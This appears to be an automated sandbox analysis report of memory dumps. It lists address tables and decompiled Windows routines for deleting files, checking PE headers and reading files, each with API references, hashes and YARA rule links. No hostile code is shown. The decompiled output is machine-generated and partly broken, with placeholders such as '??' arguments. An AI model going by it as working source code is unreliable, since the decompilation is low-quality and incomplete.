                                0x022f220b
                                0x022f220c
                                0x022f2217
                                0x022f2226
                                0x022f222b
                                0x022f222c
                                0x022f222f
                                0x022f2232
                                0x022f2235
                                0x022f2235
                                0x022f223a
                                0x022f223f
                                0x022f2241
                                0x022f2243
                                0x022f2248
                                0x022f2248
                                0x022f224d
                                0x022f224f
                                0x022f2262
                                0x022f2263
                                0x022f2268
                                0x022f2269
                                0x022f2269
                                0x022f2269
                                0x022f226d
                                0x00000000
                                0x00000000
                                0x022f2276
                                0x022f2279
                                0x022f227e
                                0x022f2283
                                0x022f2287
                                0x022f228a
                                0x022f228d
                                0x022f228f
                                0x022f22bc
                                0x022f22bc
                                0x022f22bc
                                0x022f22be
                                0x022f22c4
                                0x022f22cc
                                0x022f22d0
                                0x022f22d6
                                0x022f22d7
                                0x022f22da
                                0x022f22df
                                0x022f22e4
                                0x00000000
                                0x00000000
                                0x022f22e6
                                0x022f22e9
                                0x022f22f4
                                0x022f22f9
                                0x022f22fa
                                0x022f2305
                                0x022f2314
                                0x022f2319
                                0x022f231a
                                0x022f231d
                                0x022f2320
                                0x022f2323
                                0x022f2323
                                0x022f2328
                                0x022f232d
                                0x022f232f
                                0x022f2331
                                0x022f2336
                                0x022f2336
                                0x022f233b
                                0x022f233d
                                0x022f2350
                                0x022f2351
                                0x022f2356
                                0x022f2359
                                0x022f2359
                                0x022f235b
                                0x022f235d
                                0x022b5367
                                0x022b536b
                                0x022b5372
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022f2363
                                0x022f2363
                                0x022f2369
                                0x022f236a
                                0x022f236c
                                0x022f2371
                                0x022f2373
                                0x00000000
                                0x022f2379
                                0x022f2379
                                0x022f237a
                                0x022f237f
                                0x022f237f
                                0x022f2385
                                0x022f2386
                                0x022f2389
                                0x022f238e
                                0x022f2390
                                0x022b5378
                                0x022b537c
                                0x022f2396
                                0x022f2396
                                0x022f2397
                                0x022f239c
                                0x022f23a2
                                0x022f23a3
                                0x022f23a6
                                0x022f23ab
                                0x022f23ad
                                0x00000000
                                0x022f23b3
                                0x022f23b3
                                0x022f23b4
                                0x022f23b9
                                0x022f23ba
                                0x022f23ba
                                0x022f23bc
                                0x022f23bf
                                0x00000000
                                0x00000000
                                0x022e9153
                                0x022e9158
                                0x022e915a
                                0x022e915e
                                0x022e9160
                                0x00000000
                                0x022e9166
                                0x022e9166
                                0x022e9171
                                0x022e9176
                                0x022e9176
                                0x00000000
                                0x022e9160
                                0x022f23c6
                                0x022f23ce
                                0x022f23d7
                                0x022f23d7
                                0x022f23ad
                                0x022f2390
                                0x022f2373
                                0x022f233f
                                0x022f233f
                                0x00000000
                                0x022f233f
                                0x022f2291
                                0x022f2291
                                0x022f2293
                                0x022f2295
                                0x022f229a
                                0x022f22a1
                                0x022f22a3
                                0x022f22a7
                                0x022f22a9
                                0x00000000
                                0x00000000
                                0x022f22ab
                                0x022f22ad
                                0x022f22af
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022f22af
                                0x022f22b1
                                0x022f22b4
                                0x022f22b4
                                0x022f22b6
                                0x022b53be
                                0x022b53be
                                0x022b53be
                                0x022b53c0
                                0x00000000
                                0x00000000
                                0x022b53cb
                                0x022b53ce
                                0x022b53d0
                                0x022b53d4
                                0x022b53d6
                                0x00000000
                                0x022b53d8
                                0x022b53e3
                                0x022b53ea
                                0x022b53ea
                                0x00000000
                                0x022b53d6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022f22b6
                                0x00000000
                                0x022f228f
                                0x022f2349
                                0x022f234d
                                0x022f2251
                                0x022f2251
                                0x00000000
                                0x022f2251
                                0x022f21a4
                                0x022f21a4
                                0x022f21a6
                                0x022f21a8
                                0x022f21ac
                                0x022f21b6
                                0x022f21b8
                                0x022f21bc
                                0x022f21be
                                0x00000000
                                0x00000000
                                0x022f21c0
                                0x022f21c2
                                0x022f21c4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022f21c4
                                0x022f21c6
                                0x022f21c6
                                0x022f21c8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022f21c8
                                0x022f21a2
                                0x00000000
                                0x022f2183
                                0x022d057b
                                0x022d057d
                                0x022d0581
                                0x022d0583
                                0x022f2178
                                0x00000000
                                0x022d0589
                                0x022d058f
                                0x022d058f
                                0x022d0583
                                0x00000000

                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022F2206
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-4236105082
                                • Opcode ID: b6d1fb584001028be7738aaffb17b70457d98b513a6669aa0edd728a394757cc
                                • Instruction ID: d34ae2a6cb3fb6816ace074d6efe589f0660e9f0a4b0e5ac94daae9601ccf218
                                • Opcode Fuzzy Hash: b6d1fb584001028be7738aaffb17b70457d98b513a6669aa0edd728a394757cc
                                • Instruction Fuzzy Hash: 60514A317203029FEB54DAD4CC81F6673AAAB85714F204269ED05DB28DDA61EC42CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55A6BE, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 77%
                                			E4A55A6BE(void* __edx, long _a4, intOrPtr _a8, signed int* _a16) {
				signed int _v8;
				short _v532;
				short _v1056;
				char _v1057;
				signed int _v1064;
				intOrPtr _v1068;
				signed char* _v1072;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				signed int* _t63;
				signed int _t64;
				signed int _t65;
				void* _t80;
				signed int _t81;
				int _t85;
				int _t94;
				intOrPtr _t98;
				signed int _t100;
				void* _t102;
				signed char* _t103;
				char _t105;
				void* _t110;
				intOrPtr _t111;
				long _t112;
				signed int _t114;

				_t110 = __edx;
				_t61 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t61 ^ _t114;
				_t63 = _a16;
				_t112 = _a4;
				_t111 = _a8;
				_v1072 = _t63;
				_t64 =  *_t63;
				_v1064 =  *(_t111 + 2) & 0x0000ffff;
				_t105 = 0;
				_v1057 = 0;
				if((_t64 & 0x00000800) != 0) {
					_v1057 = 1;
				}
				if((_t64 & 0x00002000) != 0) {
					_t105 = 1;
				}
				_t103 = 0x106;
				if(_v1057 != 0 ||  *((char*)(_t112 + 0x11)) != 0 || _t105 != 0) {
					L7:
					if(( *(_t111 + 4) & 0x00000010) != 0) {
						L17:
						_t65 = 0;
						goto L18;
					}
					_v1064 = _t111 + 0x30 + (_v1064 & 0x0000ffff) * 2;
					if(E4A559F7B( &_v532, _t103,  *((intOrPtr*)(_t112 + 4)), _t111 + 0x30 + (_v1064 & 0x0000ffff) * 2) != 0) {
						_push(_v1064);
						goto L22;
					}
					if(E4A559F7B( &_v1056, _t103,  *((intOrPtr*)(_t112 + 4)), _t111 + 0x30) != 0) {
						E4A55185A( &_v1056, _t103,  &_v532);
					}
					if(_v1057 != 0) {
						_t80 = E4A56FE1B(_t103, _t105, _t110, _t111,  &_v1056, 0x232c, 0x2328);
						__eflags = _t80 - 1;
						if(_t80 == 1) {
							goto L11;
						}
						__eflags =  *0x4a5741b4; // 0x0
						_t65 = 0 | __eflags != 0x00000000;
						goto L18;
					} else {
						L11:
						_t103 = _v1072;
						if(( *_t103 & 0x00001000) != 0) {
							_t81 =  *(_t111 + 4);
							__eflags = _t81 & 0x00000001;
							if((_t81 & 0x00000001) == 0) {
								goto L12;
							}
							_t94 = SetFileAttributesW( &_v532, _t81 & 0xfffffffe);
							__eflags = _t94;
							if(_t94 != 0) {
								goto L12;
							}
							_push(_t94);
							_push(GetLastError());
							E4A556D44(_t105);
							goto L23;
						}
						L12:
						if(DeleteFileW( &_v1056) == 0) {
							_t85 = DeleteFileW( &_v532);
							__eflags = _t85;
							if(_t85 != 0) {
								goto L13;
							}
							_t112 = GetLastError();
							L14:
							if(_t112 != 0) {
								__eflags = _t112 - 0x4d3;
								if(_t112 == 0x4d3) {
									goto L23;
								}
								E4A5558F3(L"%s\r\n",  &_v1056);
								_push(0);
								_push(_t112);
								E4A556D44(_t105);
								goto L17;
							}
							_t103[0x60] = _t103[0x60] + 1;
							if( *0x4a574081 != 0 && ( *_t103 & 0x00000010) != 0) {
								E4A5599E1(_t105, 0x400023a1, 1,  &_v1056);
							}
							goto L17;
						}
						L13:
						_t112 = 0;
						goto L14;
					}
				} else {
					_t98 = E4A56002A(_t105,  *((intOrPtr*)(_t112 + 8)),  *((intOrPtr*)(_t112 + 0xc)));
					_v1068 = _t98;
					if(_t98 != 0) {
						_t100 = E4A559F7B( &_v532, 0x106,  *((intOrPtr*)(_t112 + 4)), _t98);
						__eflags = _t100;
						if(_t100 == 0) {
							 *((char*)(_t112 + 0x11)) = 1;
							_t102 = E4A56FE1B(0x106, _t105, _t110, _t111,  &_v532, 0x234e, 0x2328);
							__eflags = _t102 - 1;
							if(_t102 == 1) {
								goto L7;
							}
							L23:
							_t65 = 1;
							L18:
							return E4A5513A9(_t65, _t103, _v8 ^ _t114, _t110, _t111, _t112);
						}
						_push(_v1068);
						L22:
						E4A556D44(_t105, 0x400023da, 2,  *((intOrPtr*)(_t112 + 4)));
						goto L23;
					}
					goto L7;
				}
			}






























                                0x4a55a6be
                                0x4a55a6c9
                                0x4a55a6d0
                                0x4a55a6d3
                                0x4a55a6d8
                                0x4a55a6dc
                                0x4a55a6e3
                                0x4a55a6e9
                                0x4a55a6eb
                                0x4a55a6f1
                                0x4a55a6f3
                                0x4a55a6ff
                                0x4a56a26f
                                0x4a56a26f
                                0x4a55a70a
                                0x4a55a70c
                                0x4a55a70c
                                0x4a55a715
                                0x4a55a71a
                                0x4a55a73f
                                0x4a55a743
                                0x4a55a7e4
                                0x4a55a7e4
                                0x00000000
                                0x4a55a7e4
                                0x4a55a758
                                0x4a55a76d
                                0x4a56a2d5
                                0x00000000
                                0x4a56a2d5
                                0x4a55a789
                                0x4a56a2ec
                                0x4a56a2ec
                                0x4a55a796
                                0x4a56a307
                                0x4a56a30c
                                0x4a56a30f
                                0x00000000
                                0x00000000
                                0x4a56a317
                                0x4a56a31d
                                0x00000000
                                0x4a55a79c
                                0x4a55a79c
                                0x4a55a79c
                                0x4a55a7a8
                                0x4a56a325
                                0x4a56a328
                                0x4a56a32a
                                0x00000000
                                0x00000000
                                0x4a56a33b
                                0x4a56a341
                                0x4a56a343
                                0x00000000
                                0x00000000
                                0x4a56a349
                                0x4a56a350
                                0x4a56a351
                                0x00000000
                                0x4a56a357
                                0x4a55a7ae
                                0x4a55a7bf
                                0x4a56a364
                                0x4a56a366
                                0x4a56a368
                                0x00000000
                                0x00000000
                                0x4a56a374
                                0x4a55a7c7
                                0x4a55a7c9
                                0x4a56a37b
                                0x4a56a381
                                0x00000000
                                0x00000000
                                0x4a56a393
                                0x4a56a398
                                0x4a56a39a
                                0x4a56a39b
                                0x00000000
                                0x4a56a3a0
                                0x4a55a7cf
                                0x4a55a7d9
                                0x4a56a3b6
                                0x4a56a3bb
                                0x00000000
                                0x4a55a7d9
                                0x4a55a7c5
                                0x4a55a7c5
                                0x00000000
                                0x4a55a7c5
                                0x4a55a726
                                0x4a55a72c
                                0x4a55a731
                                0x4a55a739
                                0x4a56a287
                                0x4a56a28c
                                0x4a56a28e
                                0x4a56a2c1
                                0x4a56a2c5
                                0x4a56a2ca
                                0x4a56a2cd
                                0x00000000
                                0x00000000
                                0x4a56a2a8
                                0x4a56a2aa
                                0x4a55a7e6
                                0x4a55a7f4
                                0x4a55a7f4
                                0x4a56a290
                                0x4a56a296
                                0x4a56a2a0
                                0x00000000
                                0x4a56a2a5
                                0x00000000
                                0x4a55a739

                                APIs
                                • DeleteFileW.KERNEL32(?,?,0000232C,00002328,?,00000106,00000010,?,?,00000106,00000010,?), ref: 4A55A7BB
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: DeleteFile
                                • String ID: %s
                                • API String ID: 4033686569-3043279178
                                • Opcode ID: 0abfd8532039e5de8acfad9656184ff2f4d98b06abd603840f353dd84276e30e
                                • Instruction ID: f15f931ece1df684756efaeaa87bf59dda950959141cb95002fdc5f0dc7e7ae0
                                • Opcode Fuzzy Hash: 0abfd8532039e5de8acfad9656184ff2f4d98b06abd603840f353dd84276e30e
                                • Instruction Fuzzy Hash: ED51E6B1D5125DAEEB21DB60CF84BDA7BBCAF04300F804497FB08E6149E775DA948B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56D685, Relevance: 10.6, APIs: 7, Instructions: 121memoryfileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E4A56D685(void* __ebx, intOrPtr __edx, void* __esi, WCHAR* _a4) {
				signed int _v8;
				long _v12;
				char _v72;
				struct _SECURITY_ATTRIBUTES* _v76;
				void* _v80;
				char _v84;
				signed int _v88;
				char _v104;
				void* __edi;
				signed int _t26;
				WCHAR* _t28;
				struct _SECURITY_ATTRIBUTES* _t30;
				signed int _t34;
				signed int _t40;
				signed short* _t49;
				void* _t54;
				void* _t55;
				LONG* _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				signed int _t70;

				_t65 = __esi;
				_t63 = __edx;
				_t53 = __ebx;
				_t26 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t26 ^ _t70;
				_t28 = _a4;
				_t64 = 0;
				_v76 = 0;
				if(_t28 != 0) {
					_push(__ebx);
					_t54 = CreateFileW(_t28, 0x80000000, 1, 0, 3, 0x80, 0);
					_v80 = _t54;
					if(_t54 == 0xffffffff) {
						L20:
						_t30 = _v76;
						_pop(_t53);
						goto L21;
					} else {
						_push(__esi);
						_push( &_v72);
						_push(_t54);
						_t66 = 0x40;
						if(E4A56D3DB(_t66) == 0) {
							_t34 = 0;
						} else {
							_t34 = 0 | 0x00005a4d == _v72;
						}
						if(_t34 != _t64 && (0 | SetFilePointer(_t54, _v12, _t64, _t64) != 0xffffffff) != _t64) {
							_push( &_v84);
							_push(_t54);
							_t67 = 4;
							if(E4A56D3DB(_t67) == 0) {
								_t40 = 0;
							} else {
								_t40 = 0 | _v84 == 0x00004550;
							}
							if(_t40 != _t64) {
								_push( &_v104);
								_push(_t54);
								_t68 = 0x14;
								if(E4A56D3DB(_t68) != 0 && _v88 > _t64) {
									_t64 = GetProcessHeap;
									_t55 = HeapAlloc(GetProcessHeap(), 8, _v88 & 0x0000ffff);
									if(_t55 != 0) {
										if(E4A56D3DB(_v88 & 0x0000ffff, _v80, _t55) != 0) {
											_t63 = _v104;
											_t49 = E4A56D3B9(_t55, _v104);
											if(_t49 != 0) {
												_v76 =  *_t49 & 0x0000ffff;
											}
										}
										HeapFree(GetProcessHeap(), 0, _t55);
									}
								}
							}
						}
						CloseHandle(_v80);
						_pop(_t65);
						goto L20;
					}
				} else {
					_t30 = 0;
					L21:
					return E4A5513A9(_t30, _t53, _v8 ^ _t70, _t63, _t64, _t65);
				}
			}

























                                0x4a56d685
                                0x4a56d685
                                0x4a56d685
                                0x4a56d68d
                                0x4a56d694
                                0x4a56d697
                                0x4a56d69b
                                0x4a56d69d
                                0x4a56d6a2
                                0x4a56d6ab
                                0x4a56d6c3
                                0x4a56d6c5
                                0x4a56d6cb
                                0x4a56d7b0
                                0x4a56d7b0
                                0x4a56d7b4
                                0x00000000
                                0x4a56d6d1
                                0x4a56d6d1
                                0x4a56d6d5
                                0x4a56d6d6
                                0x4a56d6d9
                                0x4a56d6e1
                                0x4a56d6f5
                                0x4a56d6e3
                                0x4a56d6f1
                                0x4a56d6f1
                                0x4a56d6f9
                                0x4a56d720
                                0x4a56d721
                                0x4a56d724
                                0x4a56d72c
                                0x4a56d73c
                                0x4a56d72e
                                0x4a56d737
                                0x4a56d737
                                0x4a56d740
                                0x4a56d745
                                0x4a56d746
                                0x4a56d749
                                0x4a56d751
                                0x4a56d75d
                                0x4a56d76f
                                0x4a56d773
                                0x4a56d784
                                0x4a56d786
                                0x4a56d78b
                                0x4a56d792
                                0x4a56d797
                                0x4a56d797
                                0x4a56d792
                                0x4a56d7a0
                                0x4a56d7a0
                                0x4a56d773
                                0x4a56d751
                                0x4a56d740
                                0x4a56d7a9
                                0x4a56d7af
                                0x00000000
                                0x4a56d7af
                                0x4a56d6a4
                                0x4a56d6a4
                                0x4a56d7b5
                                0x4a56d7c1
                                0x4a56d7c1

                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 4A56D6BD
                                • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,?,?), ref: 4A56D705
                                • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?), ref: 4A56D766
                                • HeapAlloc.KERNEL32(00000000), ref: 4A56D769
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 4A56D79D
                                • HeapFree.KERNEL32(00000000), ref: 4A56D7A0
                                • CloseHandle.KERNEL32(?), ref: 4A56D7A9
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                • String ID:
                                • API String ID: 3093239467-0
                                • Opcode ID: 04d935dbc2d3c60323fc19791cbe7f39d67564b5cdd016bb33dc002631141a6f
                                • Instruction ID: 18462abe9cf2ea91bc9375a726b762d33720eb40578b65eca2cfe905f1f8010f
                                • Opcode Fuzzy Hash: 04d935dbc2d3c60323fc19791cbe7f39d67564b5cdd016bb33dc002631141a6f
                                • Instruction Fuzzy Hash: D1318472A00A19AADB10AAB98E84FFE7BBCEF85750F150915F509DA180EB74CD41C721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A554D9A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 98%
                                			E4A554D9A(void* _a4, short* _a8, long _a12, DWORD* _a16) {
				long _v8;
				int _v12;
				long _v16;
				int _t37;
				char* _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				int _t48;
				signed char _t50;
				char* _t57;
				int _t58;
				int _t63;

				_t57 = 0x4a576640;
				_v16 = SetFilePointer(_a4, 0, 0, 1);
				if(_a12 >= 0x1fff) {
					_a12 = 0x1fff;
				}
				 *0x4a5740f8 = 1;
				_t37 = ReadFile(_a4, 0x4a576640, _a12, _a16, 0);
				 *0x4a5740f8 = 0;
				__eflags = _t37;
				if(_t37 == 0) {
					L15:
					return 0;
				} else {
					_t40 =  *_a16;
					__eflags = _t40;
					if(__eflags == 0) {
						goto L15;
					}
					_v12 = _t40;
					_v8 = _t40;
					if(__eflags <= 0) {
						L13:
						_t58 =  *0x4a5741b8; // 0x0
						_t41 = E4A554B8D(_t58);
						asm("sbb eax, eax");
						_t44 = MultiByteToWideChar(_t58,  ~( ~_t41), 0x4a576640, _v12, _a8, _a12);
						 *_a16 = _t44;
						return _t44;
					} else {
						goto L7;
					}
					do {
						L7:
						__eflags = _v8 - 3;
						if(_v8 < 3) {
							L10:
							_t45 =  *_t57 & 0x000000ff;
							__eflags =  *(_t45 + 0x4a574e40);
							if( *(_t45 + 0x4a574e40) != 0) {
								__eflags = _v8 - 1;
								if(_v8 == 1) {
									 *0x4a5740f8 = 1;
									_t48 = ReadFile(_a4,  &(_t57[1]), 1,  &_v8, 0);
									 *0x4a5740f8 = 1;
									__eflags = _t48;
									if(_t48 == 0) {
										L23:
										 *_a16 = 0;
										goto L15;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L23;
									}
									_v12 = _v12 + 1;
									goto L13;
								}
								_v8 = _v8 - 2;
								_t57 =  &(_t57[2]);
								goto L12;
							}
							_v8 = _v8 - 1;
							_t57 =  &(_t57[1]);
							__eflags = _t57;
							goto L12;
						}
						_t50 =  *_t57;
						__eflags = _t50 - 0xa;
						if(_t50 == 0xa) {
							__eflags = _t57[1] - 0xd;
							if(_t57[1] != 0xd) {
								goto L9;
							}
							L2:
							_t57[2] = 0;
							_t63 = _t57 - 0x4a576640 + 2;
							_v12 = _t63;
							SetFilePointer(_a4, _t63 + _v16, 0, 0);
							goto L13;
						}
						L9:
						__eflags = _t50 - 0xd;
						if(_t50 == 0xd) {
							goto L1;
						}
						goto L10;
						L12:
						__eflags = _v8;
					} while (_v8 > 0);
					goto L13;
				}
				L1:
				if(_t57[1] != 0xa) {
					goto L10;
				}
				goto L2;
			}
















                                0x4a554db3
                                0x4a554dbb
                                0x4a554dc6
                                0x4a554d90
                                0x4a554d90
                                0x4a554dcc
                                0x4a554ddd
                                0x4a554de3
                                0x4a554de9
                                0x4a554deb
                                0x4a555772
                                0x00000000
                                0x4a554df1
                                0x4a554df4
                                0x4a554df6
                                0x4a554df8
                                0x00000000
                                0x00000000
                                0x4a554dfe
                                0x4a554e01
                                0x4a554e04
                                0x4a554e36
                                0x4a554e39
                                0x4a554e47
                                0x4a554e4e
                                0x4a554e54
                                0x4a554e5d
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554e06
                                0x4a554e06
                                0x4a554e06
                                0x4a554e0a
                                0x4a554e1e
                                0x4a554e1e
                                0x4a554e21
                                0x4a554e27
                                0x4a5641ea
                                0x4a5641ed
                                0x4a564205
                                0x4a56420a
                                0x4a564210
                                0x4a56421a
                                0x4a56421c
                                0x4a56422b
                                0x4a56422e
                                0x00000000
                                0x4a56422e
                                0x4a56421e
                                0x4a564221
                                0x00000000
                                0x00000000
                                0x4a564223
                                0x00000000
                                0x4a564223
                                0x4a5641ef
                                0x4a5641f4
                                0x00000000
                                0x4a5641f4
                                0x4a554e2d
                                0x4a554e30
                                0x4a554e30
                                0x00000000
                                0x4a554e30
                                0x4a554e0c
                                0x4a554e0e
                                0x4a554e10
                                0x4a555779
                                0x4a55577d
                                0x00000000
                                0x00000000
                                0x4a554be4
                                0x4a554be7
                                0x4a554bed
                                0x4a554bf0
                                0x4a554bf9
                                0x00000000
                                0x4a554bf9
                                0x4a554e16
                                0x4a554e16
                                0x4a554e18
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554e31
                                0x4a554e31
                                0x4a554e31
                                0x00000000
                                0x4a554e06
                                0x4a554bda
                                0x4a554bde
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • SetFilePointer.KERNEL32(4A574210,00000000,00000000,00000001,4A58C642,4A57C640,00000000), ref: 4A554DB5
                                • ReadFile.KERNEL32(4A574210,4A576640,00000000,?,00000000), ref: 4A554DDD
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,4A576640,4A574210,00000006,?), ref: 4A554E54
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$ByteCharMultiPointerReadWide
                                • String ID: @fWJ
                                • API String ID: 2002143677-2516145070
                                • Opcode ID: 0e279c0a84169afa9cf2b60bc3ee2342b2f0b3b1bac44014aba1f69fd614b446
                                • Instruction ID: dcc763320dd2b95609ac4d2b1c1e837f7428d10ee6ed1570593343f6eb77002b
                                • Opcode Fuzzy Hash: 0e279c0a84169afa9cf2b60bc3ee2342b2f0b3b1bac44014aba1f69fd614b446
                                • Instruction Fuzzy Hash: 8C418CB5800269FFDB219F61CB449AA7FB9EB06354F11446AF856E7218D3308E51CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56F354, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 19%
                                			E4A56F354(long _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				char _v16;
				long _t29;
				void* _t31;
				signed int _t37;
				intOrPtr _t44;
				signed int _t45;
				long _t47;
				void* _t49;
				void* _t50;
				char _t52;
				intOrPtr* _t61;
				intOrPtr _t62;

				_t47 = 0;
				_v12 = 0;
				_v16 = 0;
				_t29 = E4A56FDFD(_a4, 2, 0);
				_a4 = _t29;
				if(_t29 == 0xffffffff) {
					E4A56056B(0x6e);
					L2:
					L4A56F2D7(_t49, _t47, 1);
				}
				_t61 = __imp___get_osfhandle;
				_push(_t62);
				_t62 = _a8;
				while(1) {
					_t31 =  *_t61(_a4, _a12, _a16,  &_v8, _t47);
					_pop(_t50);
					if(ReadFile(_t31, ??, ??, ??, ??) == 0) {
						break;
					}
					_t37 =  *(_t62 + 0x1c);
					_t52 = _v8;
					_a8 = _t52;
					if((_t37 & 0x0000c000) == 0) {
						if(_t52 <= 2) {
							L10:
							_t45 = _t37 | 0x00008000;
						} else {
							if( *_a12 != 0xfeff) {
								_t47 = 0;
								goto L10;
							} else {
								_t45 = _t37 | 0x00004000;
								_t47 = 0;
							}
						}
						 *(_t62 + 0x1c) = _t45;
					}
					if(_t52 != _t47) {
						asm("sbb ecx, ecx");
						_t44 = E4A56E4DC( ~(( *(_t62 + 0x1c) & 0x00008002) - 0x8002) + 1, _a12,  &_v8,  &_v16);
						_t52 = _v8;
						_v12 = _t44;
					}
					if(_t52 == _a16) {
						continue;
					}
					if(_v12 == _t47) {
						SetFilePointer( *_t61(1), _a4, _t52 - _a8, _t47);
					}
					return _a4;
				}
				 *0x4a574128 = GetLastError();
				E4A553AB3(_a4);
				_push(_t47);
				_push( *0x4a574128);
				E4A556D44(_t50);
				_pop(_t49);
				goto L2;
			}

















                                0x4a56f35e
                                0x4a56f366
                                0x4a56f369
                                0x4a56f36c
                                0x4a56f371
                                0x4a56f377
                                0x4a56f37b
                                0x4a56f380
                                0x4a56f383
                                0x4a56f383
                                0x4a56f388
                                0x4a56f38e
                                0x4a56f38f
                                0x4a56f392
                                0x4a56f3a0
                                0x4a56f3a2
                                0x4a56f3ac
                                0x00000000
                                0x00000000
                                0x4a56f3b2
                                0x4a56f3b5
                                0x4a56f3b8
                                0x4a56f3c0
                                0x4a56f3c5
                                0x4a56f3df
                                0x4a56f3df
                                0x4a56f3c7
                                0x4a56f3d2
                                0x4a56f3dd
                                0x00000000
                                0x4a56f3d4
                                0x4a56f3d4
                                0x4a56f3d9
                                0x4a56f3d9
                                0x4a56f3d2
                                0x4a56f3e4
                                0x4a56f3e4
                                0x4a56f3e9
                                0x4a56f404
                                0x4a56f408
                                0x4a56f40d
                                0x4a56f410
                                0x4a56f410
                                0x4a56f416
                                0x00000000
                                0x00000000
                                0x4a56f420
                                0x4a56f430
                                0x4a56f430
                                0x4a56f43c
                                0x4a56f43c
                                0x4a56f448
                                0x4a56f44d
                                0x4a56f452
                                0x4a56f453
                                0x4a56f459
                                0x4a56f45f
                                0x00000000

                                APIs
                                • _get_osfhandle.MSVCRT ref: 4A56F3A0
                                • ReadFile.KERNEL32(00000000), ref: 4A56F3A4
                                • _get_osfhandle.MSVCRT ref: 4A56F42C
                                • SetFilePointer.KERNEL32(00000000), ref: 4A56F430
                                  • Part of subcall function 4A56F354: longjmp.MSVCRT(4A574AC0,00000001,?,?,4A5687D6,00000001,?,?,?), ref: 4A56F348
                                  • Part of subcall function 4A56F354: GetLastError.KERNEL32 ref: 4A56F43F
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File_get_osfhandle$ErrorLastPointerReadlongjmp
                                • String ID: %9d
                                • API String ID: 769294559-2241623522
                                • Opcode ID: 0719e5f3a136d9c34395f1737d1897a2d4bbf8b0fa0c33644b4c6bd44987123f
                                • Instruction ID: 13d78f68cfc32f7ade7110f28ff3637952667420df5e590be0fb07e20a9bad3b
                                • Opcode Fuzzy Hash: 0719e5f3a136d9c34395f1737d1897a2d4bbf8b0fa0c33644b4c6bd44987123f
                                • Instruction Fuzzy Hash: D53170B5A00209BFDF15AFA0DA84DAE3B79EF44315F10852AFA06DA5D0DB70DE49CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56D26F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98registryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • %s=%s, xrefs: 4A56D2B9
